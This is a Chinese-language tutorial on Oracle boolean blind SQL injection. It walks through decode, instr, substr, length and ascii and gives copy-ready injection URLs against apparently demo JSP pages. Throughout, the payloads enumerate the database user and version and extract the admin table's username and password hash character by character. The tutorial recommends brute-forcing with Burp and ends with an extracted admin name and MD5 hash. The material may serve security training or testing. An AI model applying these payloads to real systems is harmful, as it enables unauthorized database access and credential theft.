0x01 decode 函數布爾盲注
decode(字段或字段的運算,值1,值2,值3)
這個函數運行的結果是,當字段或字段的運算的值等於值1時,該函數返回值2,否則返回3
當然值1,值2,值3也可以是表達式,這個函數使得某些sql語句簡單了許多
使用方法:
比較大小
select decode(sign(變量1-變量2),-1,變量1,變量2) from dual; --取較小值
sign()函數根據某個值是0、正數還是負數,分別返回0、1、-1
例如:
變量1=10,變量2=20
則sign(變量1-變量2)返回-1,decode解碼結果為“變量1”,達到了取較小值的目的。
SQL> select decode(sign(10-20),-1,10,20) from dual;
DECODE(SIGN(10-20),-1,10,20) ---------------------------- 10
所以這個decode函數在我們注入中的應用
測試當前用戶
select decode(user,'SYSTEM',1,0) from dual;
如果是system用戶則返回1,不是則返回0.
SQL> select decode(user,'SYSTEM',1,0) from dual;
DECODE(USER,'SYSTEM',1,0) ------------------------- 1 SQL> select decode(user,'SYS',1,0) from dual; DECODE(USER,'SYS',1,0) ---------------------- 0
注入點中decode盲注應用
判斷是否是SCOTT用戶
http://www.jsporcle.com/a.jsp?username=SMITH' and 1=(select decode(user,'SCOTT',1,0) from dual) --
當前也可以用字符逐個猜解,利用到substr()函數
http://www.jsporcle.com/a.jsp?username=SMITH' and 1=(select decode(substr(user,1,1),'S',1,0) from dual) --
這里只需要替換我們需要查的內容即可 不一一列舉了,比如查詢Oracle版本,判斷版本的字符串第一個字符是否是O
http://www.jsporcle.com/a.jsp?username=SMITH' and 1=(select decode(substr((select banner from sys.v_$version where rownum=1),1,1),'O',1,0) from dual) --
獲取當前用戶
(select user from dual)
獲取當前版本
(select banner from sys.v_$version where rownum=1)
獲取當前admin表的帳號和密碼
(select username||password from admin)
獲取字符長度
select length(user) from dual --
select * from art where id=1 and 6=(select length(user) from dual) --
http://www.jsporcle.com/news.jsp?id=1 and 6=(select length(user) from dual) --
當前用戶第一個字母的是否等於S 等於返回1否則返回0
(select decode(substr(user,1,1),'S',1,0) from dual) -- (select decode(substr(user,2,1),'Y',1,0) from dual) -- (select decode(substr(user,3,1),'S',1,0) from dual) -- (select decode(substr(user,4,1),'T',1,0) from dual) -- (select decode(substr(user,5,1),'E',1,0) from dual) -- (select decode(substr(user,6,1),'N',1,0) from dual) --
測試當前用戶語句
http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr(user,1,1),'S',1,0) from dual) --
獲取當前admin表的帳號和密碼
select * from art where id=1 and 1=(select decode(substr((select username||password from admin),1,1),'a',1,0) from dual) http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr((select username%7c%7cpassword from admin),1,1),'a',1,0) from dual)
判斷字符的字符
abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.
查詢第二個的時候
http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr((select username%7c%7cpassword from admin),2,1),'d',1,0) from dual) --
大概知道這些函數的用法 跑腳本爆破即可 burpsuite為例
0x02 instr函數布爾盲注
instr函數的使用,從一個字符串中查找指定子串的位置。例如:
SQL> select instr('abcdefgh','de') position from dual;
POSITION
----------
4
從1開始算 d排第四所以返回4
盲注中的應用:
http://www.jsporcle.com/news.jsp?id=1 and 1=(instr((select user from dual),'SYS')) --
BURP爆破用戶名
0x03 通用盲注方法 逐字猜解
先獲取數據長度
37=(select length(username||password) from admin)
轉碼測試
http://www.jsporcle.com/news.jsp?id=1 and 37=(select length(username%7c%7cpassword) from admin)-- select * from art where id=1 and 37=(select length(username||password) from admin);
猜解ascii碼
http://www.jsporcle.com/news.jsp?id=1 and (select ascii(substr(username%7c%7cpassword,1,1)) from admin)=97 --
同樣 burp或腳本爆破即可
猜解結果: admine10adc3949ba59abbe56e057f20f883e